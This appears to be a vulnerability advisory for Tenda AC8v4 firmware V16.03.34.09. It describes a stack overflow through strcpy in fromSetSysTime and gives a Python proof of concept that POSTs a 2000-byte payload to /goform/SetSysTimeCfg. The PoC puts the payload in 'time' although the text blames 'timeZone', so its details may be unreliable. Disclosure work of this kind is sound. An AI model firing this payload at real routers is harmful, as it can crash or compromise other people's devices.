Overview

• Firmware download website: https://www.tenda.com.cn/download/detail-3683.html

Affected version

AC8v4 V16.03.34.09

Vulnerability details

The Tenda AC8v4 V16.03.34.09 firmware firmware has a stack overflow vulnerability in the fromSetSysTime function. The v5 variable receives the timeType parameter from a POST request and we let v5=="sync" to execute function sub_4A75C0.

The s variable receives the timeZone parameter from a POST request. However, since the user can control the input of timeZone, the statement strcpy((char *)v6, s); can cause a buffer overflow. The user-provided timeZone can exceed the capacity of the v6 array, triggering this security vulnerability.

POC

import requests
from pwn import*
​
ip = "192.168.84.101"
url = "http://" + ip + "/goform/SetSysTimeCfg"
payload = b"a"*2000
​
data = {
        'timeType':'sync',
        'time':payload,
    }
response = requests.post(url, data=data)
print(response.text)